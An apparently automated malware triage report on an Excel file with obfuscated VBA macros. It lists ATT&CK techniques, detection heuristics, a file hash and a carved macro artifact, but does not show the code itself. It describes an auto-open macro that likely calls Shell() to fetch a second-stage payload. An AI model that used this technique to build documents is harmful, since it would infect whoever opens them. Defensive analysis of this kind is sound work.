Verdict: MALICIOUS
Risk Score: 224
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The file contains VBA macros, including a Workbook_Open macro, which is a common technique for executing malicious code upon opening. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, likely to download and execute a secondary payload. The presence of a 'macros.bas' file further supports this. The obfuscated strings within the VBA code suggest an attempt to hide the payload's origin or execution details.
Heuristics (7)
- ClamAV: Xls.Malware.Cwsp-6735643-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- Workbook_Open macro [high] OLE_VBA_WBOPEN: Workbook_Open macro
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14332 bytes |

SHA-256: 3e937d14b93e3fefdc36053258fdb897e1a85f33698018640d5bd43a46443836
Detection (ClamAV): No threats found
Obfuscation or payload: likely. Carved artifact contains 52 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script (the decoded source consists of the ThisDocument attributes, a Workbook_Open macro, and a long run of obfuscated string constants; the preview is truncated).